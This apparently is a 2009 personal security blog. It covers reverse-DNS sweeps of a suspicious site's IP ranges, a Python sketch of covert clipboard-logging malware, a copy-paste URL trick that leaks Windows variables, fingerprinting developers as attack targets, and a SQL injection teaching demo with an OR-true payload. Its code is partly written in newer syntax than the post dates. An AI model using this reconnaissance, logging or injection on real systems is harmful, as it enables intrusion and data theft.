Last week, I received an email "from a friend" that invited me to create an account on some site in order to view "some pictures" he had sent me. The last step in the sign-up process included giving the site my gmail login information, which I was not about to do. At that point, I wondered if my friend was aware that I had been sent a message "from him". It turned out that he was not aware that the site had sent out an email to me. He did say, however, that he had gone through the signup process and had given the site his gmail login information. Following that, the site had sent emails to everyone it could find in his gmail account, telling them all that he had pictures he wanted to show them.

Needless to say, I found this rather disconcerting and wanted to find more information about the site. One of the things I did was to figure out what other subdomains the site has on its server.

It's easy enough to figure out the main ip address of a website. From there, finding many subdomains isn't hard. Most web hosting companies hand out ip addresses in a somewhat sequential manner, and most companies sign up for their main servers all at the same time. This should mean that their servers' ip addresses are clustered around each other, which makes it easy to enumerate all of them and see if the resolved domain names for those ip addresses belong to the site. This is how I did it from the command line:
@del ips.txt 2>nul &cmd /c "for /l %i in (0, 1, 255) do @echo 216.157.72.%i >> ips.txt & @echo 216.157.73.%i >> ips.txt" & nslookup 2>nul < ips.txt > results.txt & type results.txt | find /i "wegame"
Yeah, I know it's a bit much all at once. Here is the same command in a more readable form:
@del ips.txt 2>nul &
cmd /c 
    "for /l %i in (0, 1, 255) do
        @echo 216.157.72.%i >> ips.txt &
        @echo 216.157.73.%i >> ips.txt" &
nslookup 2>nul < ips.txt > results.txt &
type results.txt | find /i "wegame"
So, I start out by deleting any old ips.txt lying around, sending any error output to nul ( @del ips.txt 2>nul ). Then I run a for loop that generates ips in a separate cmd (hence the cmd /c). The for loop loops from 0 to 255 ( for /l %i in (0, 1, 255) ) and appends each loop value (%i) to the two ip prefixes (216.157.72. and 216.157.73.). I chose to generate ips in this range because the main server's ip address is 216.157.72.224, almost in the middle of both ranges. After generating the ip addresses, I send the resulting file (ips.txt) to nslookup ( < ips.txt ), send any error output to nul ( 2>nul ), and output the results to a text file ( > results.txt ). I then type the contents of results.txt, piping the output to a find command that searches for the name "wegame" ( type results.txt | find /i "wegame" ). The output looks like this:
Name:    test3.wegame.com
Name:    test3.wegame.com
Name:    medproc3.wegame.com
Name:    medproc3.wegame.com
Name:    db2.wegame
Name:    db2.wegame
Name:    vip1.wegame.com
Name:    fw.wegame
Name:    medproc1.wegame
Name:    medproc1.wegame
Name:    medproc2.wegame
Name:    medproc2.wegame
Name:    test2.wegame
Name:    test2.wegame
Name:    test1.wegame
Name:    test1.wegame
You could also make it more verbose about what it is doing by changing it to look like this:
@echo . & @echo ------------------------------ & @echo . NSLOOKUP SCRIPT & @echo ------------------------------ & @echo . & @echo . Generating ips into ips.txt & @del ips.txt 2>nul & cmd /c "for /l %i in (0, 1, 255) do @echo 216.157.72.%i >> ips.txt & @echo 216.157.73.%i >> ips.txt" & @echo . Running nslookup on generated ips & @echo . (results outputted to results.txt) & nslookup 2>nul < ips.txt > results.txt & @echo . Searching results for [wegame] & type results.txt | find /i "wegame" & @echo . DONE!
The new output will look like this:
.
------------------------------
.      NSLOOKUP SCRIPT
------------------------------
.
.     Generating ips into ips.txt
.     Running nslookup on generated ips
.           (results outputted to results.txt)
.     Searching results for [wegame]
Name:    test3.wegame.com
Name:    test3.wegame.com
Name:    medproc3.wegame.com
Name:    medproc3.wegame.com
Name:    db2.wegame
Name:    db2.wegame
Name:    vip1.wegame.com
Name:    fw.wegame
Name:    medproc1.wegame
Name:    medproc1.wegame
Name:    medproc2.wegame
Name:    medproc2.wegame
Name:    test2.wegame
Name:    test2.wegame
Name:    test1.wegame
Name:    test1.wegame
.  DONE!
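The same reverse-lookup sweep can be sketched in Python using the standard library's socket module. This is a rough equivalent, not the original one-liner: it generates the two /24 ranges, does a PTR lookup on each address, and prints any name containing "wegame". The IP ranges are the ones from the post; what the lookups actually return today will of course differ.

```python
import socket

def generate_ips(prefixes, start=0, end=255):
    """Build the list of addresses to sweep, e.g. 216.157.72.0-255."""
    return [f"{p}.{i}" for p in prefixes for i in range(start, end + 1)]

def reverse_lookup(ip):
    """Return the PTR hostname for an IP, or None if the lookup fails."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None

if __name__ == "__main__":
    for ip in generate_ips(["216.157.72", "216.157.73"]):
        name = reverse_lookup(ip)
        if name and "wegame" in name.lower():
            print(f"{ip}\t{name}")
```

Unlike the batch version, there is no intermediate ips.txt or results.txt; the filtering happens inline.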

Friday, August 14, 2009

Clipboard Attacks

I was thinking today, while using Remote Desktop to monitor one of the servers at work, about how the clipboard is such a universally accessible piece of the Windows operating system. To the best of my knowledge, there is no real restriction on a program using or accessing it. A typical user uses the clipboard many times a day, often copying important information and pasting it elsewhere.

Would it be feasible for a piece of malware to do nothing but monitor the clipboard and store all new text in a file? If so, the malware would keep a relatively low profile and not draw any undue attention to itself. It would capture anything copied throughout the user's session. It would also capture anything copied in a Remote Desktop session, since anything copied in Remote Desktop is also available to be pasted on the user's actual desktop (and vice versa). I am sure there are hundreds of other interesting situations where one could take advantage of the universality of the clipboard.
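The core of such a monitor is just a polling loop that logs text only when it changes. Here is a minimal sketch of that logic in Python; the `read_clipboard` callable is a hypothetical stand-in for a platform call (on Windows, something like pywin32's clipboard functions would fill that role), injected here so the dedup-and-log behavior can be shown on its own.

```python
import time

def monitor_clipboard(read_clipboard, log, polls, interval=0.0):
    """Poll a clipboard-reading function and log each *new* piece of text.

    `read_clipboard` is a hypothetical stand-in for a real platform
    clipboard call; consecutive duplicate reads are skipped so the log
    only grows when the clipboard contents actually change.
    """
    last = None
    for _ in range(polls):
        text = read_clipboard()
        if text and text != last:
            log.append(text)
            last = text
        time.sleep(interval)
    return log

if __name__ == "__main__":
    # Simulated sequence of clipboard reads; the duplicate is skipped.
    reads = iter(["password123", "password123", "4111-1111-1111-1111",
                  None, "notes"])
    captured = monitor_clipboard(lambda: next(reads), [], polls=5)
    print(captured)  # ['password123', '4111-1111-1111-1111', 'notes']
```

A real implementation would run indefinitely and write to disk, but the point is how little machinery is needed.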

One interesting example of clipboard usage, although not related to capturing copied information, is related to RSnake's post about De-cloaking in IE7.0 using windows variables. All it would take for this to actually work is for a user to be sent an email with a link in it that doesn't go anywhere. Under the link, some text could say "Link not working? Copy and paste this into your address bar..." and boom! variable expansion and the accessed server has logged whatever expanded windows variables were contained in the copied url.

Monday, August 3, 2009

Removing .svn Folders (WINDOWS)

Sometimes I have to copy a folder for a school or work project that I manage with SVN. Usually I don't want to keep the original .svn folders. Instead of tediously going through each directory and deleting each .svn folder, I use something like this to delete all .svn folders in the current directory and subdirectories:
for /f "delims=^" %f in ('dir /s /b /a:D ^| findstr ".*\.svn$"') do @rmdir /s /q "%f"
You could make it a little more verbose with its output by using something like this:
@echo . & @echo Removing Directories: & @echo . & for /f "delims=^" %f in ('dir /s /b /a:D ^| findstr ".*\.svn$"') do @echo -- %f & @rmdir /s /q "%f"
In a more readable format, the command looks like:
@echo .
@echo Removing Directories:
@echo .

for /f "delims=^" %f in ('dir /s /b /a:D ^| findstr ".*\.svn$"') do
    @echo -- %f
    @rmdir /s /q "%f"
After sprinkling some new .svn folders throughout my hard drive, this is the resulting output:
.
Removing Directories:
.
-- C:\.svn
-- C:\Documents and Settings\.svn
-- C:\Documents and Settings\All Users\.svn
-- C:\Documents and Settings\All Users\Desktop\.svn
-- C:\Drivers\.svn
-- C:\Program Files\.svn
-- C:\Program Files\Adobe\.svn
-- C:\Program Files\Adobe\Reader 9.0\.svn
-- C:\WINDOWS\.svn

C:\>
Hope that helps :) Variations on this command have saved me a lot of time. If you need a better explanation of what everything does, let me know.
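For anyone who prefers a script to a one-liner, here is a rough Python equivalent (assuming Python is available), using os.walk and shutil.rmtree to do what the for/rmdir combination does above:

```python
import os
import shutil

def remove_svn_dirs(root):
    """Delete every .svn directory under root; return the paths removed."""
    removed = []
    for dirpath, dirnames, _ in os.walk(root, topdown=True):
        if ".svn" in dirnames:
            target = os.path.join(dirpath, ".svn")
            shutil.rmtree(target)
            removed.append(target)
            # Prune .svn so os.walk doesn't descend into the deleted dir.
            dirnames.remove(".svn")
    return removed

if __name__ == "__main__":
    for path in remove_svn_dirs("."):
        print("--", path)
```

Because os.walk is top-down, pruning `.svn` from `dirnames` keeps the walk from trying to enter a directory that was just removed.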

Monday, June 29, 2009

live.sysinternals.com/tools

Mark Russinovich's Sysinternals tools come in very handy. A recent post over at the Sunbelt blog shows that all of the Sysinternals tools are easily accessible from the command line and even Windows Explorer. Below is an example of me testing this out:

C:\>\\live.sysinternals.com\tools\pslist.exe

pslist v1.28 - Sysinternals PsList
Copyright © 2000-2004 Mark Russinovich
Sysinternals

Process information for CONDORMAN:

Name                Pid Pri Thd  Hnd   Priv        CPU Time    Elapsed Time
Idle                  0   0   2    0      0     0:31:10.187     0:00:00.000
System                4   8  66  840      0     0:00:21.000     0:00:00.000
smss                644  11   3   21    172     0:00:00.015     0:19:50.041
csrss               872  13  12  824   6788     0:00:54.265     0:19:47.322
winlogon            896  13  18  523   6576     0:00:01.734     0:19:47.057
services            940   9  16  345   1812     0:00:07.484     0:19:46.291
lsass               952   9  22  466   4364     0:00:02.656     0:19:46.260
svchost            1112   8  18  226   2772     0:00:00.171     0:19:45.135

Tuesday, June 2, 2009

Client Fingerprinting

At my current job, I do a lot of programming with Flash (Flex, actually), as well as ASP.NET and similar platforms. I am constantly working on and debugging the web apps I manage and develop. I have a debug Flash Player installed in most of the browsers I surf the web with, as well as numerous browser add-ons/extensions that help with development. I've been wondering lately if I should be more careful about the signature my browser creates.

A few weeks ago, I had a rather disconcerting thought: attackers might specifically target web developers for client-side attacks. Who would be a better target? Of all employees in a company, developers are often granted more rights/permissions than they actually need to get the job done. Developers also require access to databases and to test and production systems, and are given more leeway than most.

One might ask: "Why would a developer as a potential target be preferred over someone else, such as a network admin, who also has access to critical systems?"
  • First, typical web developers are easily distinguished from normal visitors to a web site through information that is available from the browser, whereas system admins usually don't carry such an obvious signature when surfing the web.
  • Second, occasional erratic computer/browser behavior is something developers are accustomed to and is something those who work with the developers could easily explain away and dismiss.
  • Third, many web developers are not focused as much as they should be on the security of their apps, let alone their own personal security when they develop web applications.
  • Fourth, sites commonly visited by web-developers are easily identified. Sites (forums especially) that contain walkthroughs and tutorials for certain technologies and practices would most certainly be visited frequently by developers.
By targeting web developers, attackers would be able to focus their efforts on clients with a greater potential pay-off.

There are several platforms that require special "debug" versions of a program to be installed in order for the developer to debug his applications. The foremost in my mind is the Flash Debug Player. The Flash Debug Player is very easily detected. It obviously has more functionality than the normal player, functionality that has possibly not been tested as thoroughly as the normal Flash Player's. The Flash Debug Player allows a debugger to connect to the loaded swf and step through its execution line by line. What would happen if a malicious swf with additional debug information were loaded into a debugger? Although not very likely, it is something to think about, especially since several apps found online automatically display the "Connect to Remote Debugger" dialog when a Flash Debug Player is installed. Also, since a debug Flash Player is so easily detected, it is yet another easily obtained signature that would flag a user as being a developer.

Here are some common and basic "signatures" that I have come up with that should flag a user as being a web developer:
  • Firebug Extension/Add-on
  • Debug Flash Player
  • Web Developer Extension/Add-on
  • User Agent Switcher Extension/Add-on
  • Tamper Data Extension/Add-on
  • Codetech Extension/Add-on
  • Greasemonkey Extension/Add-on
  • Colorzilla Extension/Add-on
  • MeasureIt Extension/Add-on
  • Hundreds of others...
Whether all of these can be detected on the client side remains to be seen, although many of them already can be. (Firebug can for sure -- as a quick POC, open up Gmail and turn on Firebug; Gmail will tell you that Firebug slows it down.)

Also note that the general idea of fingerprinting clients through readily available information can be used not only to detect the presence of a web-developer, but also possibly to determine how "savvy" the user is with computer technologies, and to detect other "classes" of users (network admin, n00b, old person [?], hacker, teacher, designer, etc.).

Knowledge is power.

Monday, June 1, 2009

Cyber Force Cybercom

Over at TaoSecurity, a post was put up that talked about President Obama's "real" speech addressing cyber security. I started reading it and thought "Holy cow! This is awesome!" I got way excited and started writing up my thoughts on the creation of a Cyber Force branch of the military that was mentioned. After I had written down most of my thoughts, I saw a note at the bottom of the post that says
"Note: If you read this far I am sure you know this was not the President's "real speech." This is what I would have liked to have heard."
I decided to write up the rest of my thoughts on the matter. I kept my original excitement in as well :) Now on to my "real" post:

ps- I've run across an article that talks about a new "cyber command" that will be coming into play. Below are links to that article and other similar ones that seem to support this idea:
http://news.yahoo.com/s/afp/20090530/pl_afp/usitobamacomputercybersecuritymilitary
http://www.stripes.com/m/article.asp?section=104&article=63001
http://www.switched.com/2009/05/29/white-house-creating-new-cyber-command-office-for-military/

pps- Well, it's finally happened! I'm a little delayed putting this in here, but here it is. Defense Secretary Robert M. Gates has created a new command called Cybercom that will defend our networks at home and develop offensive weapons. An article at the Washington Post talks about it more.

President Obama gave a speech on cyber security last Friday. TaoSecurity had received a hard copy of the President's prepared remarks sometime before he actually gave his speech. At one point during his speech, he went off of what had been prepared (here's what he actually said). TaoSecurity made a post that talked about the things President Obama didn't say that were in his prepared speech. One of them is this:

"We will instruct the Secretary of Defense to examine the creation of a Cyber Force as an independent military branch. Just as we fight wars on land, at sea, and in the aerospace domains, we should promote warfighters thoroughly steeped in the intricacies of defense and attack in the cyberspace domain. We will also make it clear to our national adversaries that a cyber attack upon our national interests is equivalent to an attack in any other domain, and we will respond with the full range of diplomatic, information, military, and economic power at our disposal."

How cool is this?!?! This is actually something I've been thinking about and hoping for for quite some time, and I've often wondered when the government would get around to thinking along the same lines. Creating another branch of the military whose area of expertise is cyber warfare will have a massive influence on our culture and perspective on computer security. Below is a list of several ways I think the US and the world will be influenced:
  1. Increased Awareness
    War hasn't changed too much over the years. Our troops muster up courage and travel to where the enemy is and show them who's boss. The front-lines of war seem to have remained away from our homes and daily routines. Until recently, that is. Our computer networks and digital infrastructure are increasingly becoming the targets of attacks from enemy nations. Speaking of this at such a high level doesn't quite carry across the potential impact that exists. Consider the following:

    Most people have a bank account. In the days before most banking was done online, it was necessary to physically go to the bank to withdraw/deposit money (who would've thought?) Imagine one day going to your bank, and the bank is gone, vanished. It was there the day before when you drove by, but now it is gone! All that exists where the bank was is a big black hole, or possibly a poster made with butcher paper and paint containing offensive reasons to fight against democracy. You try calling the bank, but you can't get through. You try purchasing a few items with your debit card, but the transaction fails. This is one thing that could happen if only our banks became the focus of attacks from enemy nations. Such an attack would affect each of our personal lives to an intense degree.

    The creation of a Cyber Force as a new military branch will pull cyber security into the limelight. The public should be made aware of why a new military branch is necessary and will come to realize how critical our digital infrastructure is. The public could be made aware through free programs and/or public demonstrations. The demonstrations could show, on a personal level, how much we depend on our digital connections and how much an attack on them would affect us. I believe such demonstrations, coupled with additional opportunities to learn, would be most effective at informing the most people. This increased awareness will be the main impetus for the other points below.
  2. Digital Infrastructure: From Mere Commodity to National Asset
    The increased awareness described above will cause people to realize how vital our digital infrastructure is. It will begin to be viewed not only as a commodity and something nice to have around, but as something that is absolutely necessary for our nation to function in its current state. Hopefully, we will stop taking it for granted and will view it as a national asset that we need to protect. We will become aware that it is one of our nation's largest vital organs.
  3. Coding and Network Standards
    Contractors who create or offer products and services to the military usually must meet a much higher standard than the private sector's standards before their product/service will be considered or used. Their products/services will be on the "front-line" and will probably have to hold their own against enemy attacks of some kind. Other assets will depend on the functionality of this product to complete their missions. The failure of one product/service will drastically affect the outcome of the current mission and the integrity of the "team".

    As we become more aware, we will realize that our digital infrastructure is part of our front-line and is not being held to the same standards as our products/services on the traditional front-lines. Hopefully, we will realize that a lapse in security of one product/service will almost certainly affect the integrity of another. I believe that new forms of coding standards will be introduced, along with a way to enforce/regulate the type of code/network/service that is put on our "front-line".
  4. Increased Funding/Opportunities for Research
    With the creation of a new branch of the military, the government will be looking for companies to place bids on projects they need completed, and companies will be looking to meet the new demand for security solutions. More companies will enter this market and each of those companies will need their own security professionals and researchers. I believe this market will grow much larger than it currently is.

    The creation of the Cyber Force could also actually start a new "arms" race. This arms race would occur both inside the U.S., as competition between research groups and companies, and between the U.S. and other countries. Research groups at universities would also receive more funding to further our defensive and offensive technologies in the field of cyber security. The new Cyber Force branch would need its own research teams and divisions as well.
  5. Additional Education/Development Programs
    Similar to how ROTC programs work with other branches of the military, I can easily foresee ROTC (or Cyber Force specific) programs being implemented. High-school and college students would jump into these programs headfirst and would enjoy them tremendously. These programs would have high enrollments, for everyone who likes computers at least secretly wishes they knew more about computer security and what is possible. They would also have a very high retention rate, both because of the nature of the subject matter itself and because those enrolled would most likely not be exposed to physical danger should they continue into the Cyber Force. I know that if I had been given the chance to formally study cyber security in high school, with the possibility of becoming a professional in that field in the military, I would've jumped at it. I still would, actually.

    Few universities have majors with an emphasis on Information Assurance/Computer Security, and even fewer offer dedicated majors in the field. I believe higher education institutions would see an increase in the number of students interested in computer security. This would spur universities to develop full programs centered on computer security, possibly with the creation of new majors and/or graduate degrees.

In my opinion, this is an EXCELLENT idea. I literally can't wait to see what comes out of this. I think it has the potential to be something amazing.

Thanks for reading!

Wednesday, May 27, 2009

Hardlinks vs Softlinks?

Lately I've been devouring every security blog I find, almost to the point where I'm trying to cut back, because I keep making excuses to put off my homework and studies just a little longer so I can read one more extremely interesting article. Not that it's really that bad, but it is something I enjoy tremendously.

Better get back to the topic of this post though: hardlinks vs softlinks. What prompted me to look more into this is a post on Command Line Kung Fu that talks about file linking. Paul started off talking about how to link files on *nix platforms, and then Ed came back and talked about how Windows doesn't have a way to do this.

This caught me way off guard. I thought, "What about using fsutil to create a hardlink?" For example, you could use something like the following to create a hardlink to a file:
C:\>fsutil hardlink create newfile.txt oldfile.txt
Hardlink created for C:\newfile.txt <<===>> C:\oldfile.txt
My first reaction was that maybe Ed forgot about that command, but I quickly dismissed that notion. If anything I probably didn't understand why Ed didn't count using fsutil hardlink create as an option for creating links.

After re-reading the post, I noticed a special requirement at the beginning that said there should be only one original of the file(s)/directory. From what I knew about hardlinks and fsutil, new files that are hardlinks to an existing file also become "originals." This means that deleting the file the hardlinks were made from will not make the hardlinked files useless. They each still refer to the same file contents and remain linked to each other.

After a little more research into the matter, I came up with several main differences between hardlinks and softlinks.
  1. Softlinks create something more akin to a shortcut to a file, so only one original file is maintained.
  2. Deleting a hardlinked file does not delete the other hardlinked files; a file is never "fully" deleted until all hardlinks to it are deleted.
  3. Softlinked files are useless without the original file.
  4. Hardlinks cannot be made to directories.
  5. Softlinks can be made to directories.
  6. Hardlinks must exist on the same filesystem.
Also, it is not possible to create hardlinks to/from alternate data streams, which would be very interesting.
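The "hardlinks survive deletion" behavior is easy to demonstrate. Here is a small Python sketch (os.link works the same way on NTFS and *nix filesystems): create a file, hardlink it, delete the original name, and the data is still reachable through the link.

```python
import os
import tempfile

def hardlink_survives_delete(tmpdir):
    """Show that a hard link still works after the original is deleted."""
    original = os.path.join(tmpdir, "oldfile.txt")
    link = os.path.join(tmpdir, "newfile.txt")
    with open(original, "w") as f:
        f.write("hello")
    os.link(original, link)   # hard link: both names point at one inode
    os.remove(original)       # delete the "original" name
    with open(link) as f:     # the contents survive via the other name
        return f.read()

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        print(hardlink_survives_delete(d))  # prints "hello"
```

Replacing os.link with os.symlink in the same sketch would instead leave a dangling link that raises an error when opened, which is exactly difference #3 above.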

As it turns out, I was right in assuming that Ed knows what he is talking about :)

Starting Up

A recent post on pauldotcom talks about ways to get started in the Information Security field. This is an article I wish I had found when I was first trying to get into it. Right now, I wouldn't say I'm currently in the field (meaning I don't have a job that deals directly with Information Security), but I definitely feel like I'm well on my way.

Most of the points are things someone relatively smart with common sense would figure out on their own. One of them mentioned getting involved with local groups (Linux user groups, hacker groups, etc.), which was something I hadn't really thought of before (even though it makes total sense) that might help me gain more experience with computer security. If school and my job would give me more free time, I'd like to look into this option more.

Monday, May 18, 2009

Teach the Students!

This is a topic that I feel rather passionate about. I am starting some research into the top universities in the nation to see if any of them require some knowledge of secure programming before allowing their students to graduate. My guess is that none of them do.

Earlier this year, I took an upper-level course whose main subject was ethics and computers in society. Each of us was asked to give a presentation on a specific topic of our choosing that fell under one of the broader topics we were to discuss in class. I quickly chose to talk about something within the scope of computer security, but had a hard time choosing a specific topic. I wanted to talk about something that could influence my peers to become more aware and security conscious.

My original ideas ranged from making my peers generally aware of what an attacker is capable of to covering some of the consequences of attacking or hacking an application/network. One day, I was perusing one of my school's sites and followed my habit of tossing text into a form that would make it apparent whether or not the inputs were sanitized. Lo and behold, an SQL error message appeared where the search results should have been! I explored the site a little more and discovered that the entire site was vulnerable to SQL injection. Later that week, I discovered more of my school's sites that were vulnerable. These revelations were shocking to me, for I knew that student programmers had made those sites. I couldn't believe they weren't aware of something as simple as SQL injection. I thought to myself that at least some basic knowledge or awareness of security principles should be required before allowing a student to develop a website. I then realized that the entire undergrad curriculum never includes anything on the topic of secure programming or making us "future programmers of the world" more security aware. My topic had found me.

I started off my presentation with some basic PHP code that selects data from a database based on a user's search. I asked the rest of the class if they saw anything wrong with the code. A few (meaning two or three) of my peers noticed the code was vulnerable to SQL injection. The rest were clueless and watched in amazement as I demonstrated what was possible when user inputs are not properly sanitized. Realizing that most of my peers were completely unaware of SQL injection was quite a shock, for I knew that many of them currently held jobs as web programmers, and I had hoped that upper-level computer science students would know better. I ended my presentation by pointing them to the CWE/SANS top 25 most dangerous programming errors site and practically begged them to become more aware of security concerns and issues.
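The kind of demo I gave can be reproduced in a few lines. This sketch uses Python and sqlite3 rather than the PHP from my presentation, but the idea is identical: splicing user input into a query string lets a classic `' OR '1'='1` payload dump every row, while a parameterized query treats the same payload as inert data. (Table name, columns, and sample rows are made up for the example.)

```python
import sqlite3

def search_unsafe(conn, term):
    # Vulnerable: user input is spliced directly into the SQL string.
    return conn.execute(
        f"SELECT name FROM users WHERE name = '{term}'").fetchall()

def search_safe(conn, term):
    # Parameterized: the driver treats `term` strictly as data.
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (term,)).fetchall()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.execute("INSERT INTO users VALUES ('bob', 'hunter2')")

    payload = "x' OR '1'='1"
    print(search_unsafe(conn, payload))  # [('alice',), ('bob',)] -- dumps every row
    print(search_safe(conn, payload))    # [] -- payload matched nothing
```

The one-character difference between building a string and binding a parameter is the entire lesson.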

Since my initial experience with my peers' lack of awareness of basic elements of secure web programming, I have constantly thought that one of the greatest ways to increase computer security in the world is to teach the students about it and to keep them informed. In all of the curriculum that is required for a computer science major at my university, none of the courses talk about security concerns and secure programming. This should be a requirement for all universities and colleges that offer Computer Science, Information Technology, Information Systems, or other related majors. Having a requirement to learn about these subjects would immensely help solve many of the security issues present in our world today. Yes, we should continue to educate and inform current professionals in the industry, but I feel that a bottom-up approach would be the most effective and have the greatest long-term impact. As many others have already said, awareness is one of the keys to combating computer security issues.

Wednesday, April 29, 2009

And so it begins

The first post, as well as a few tests: Code examples will look like this:
C:\WINDOWS>dir /s /b hosts //find the hosts file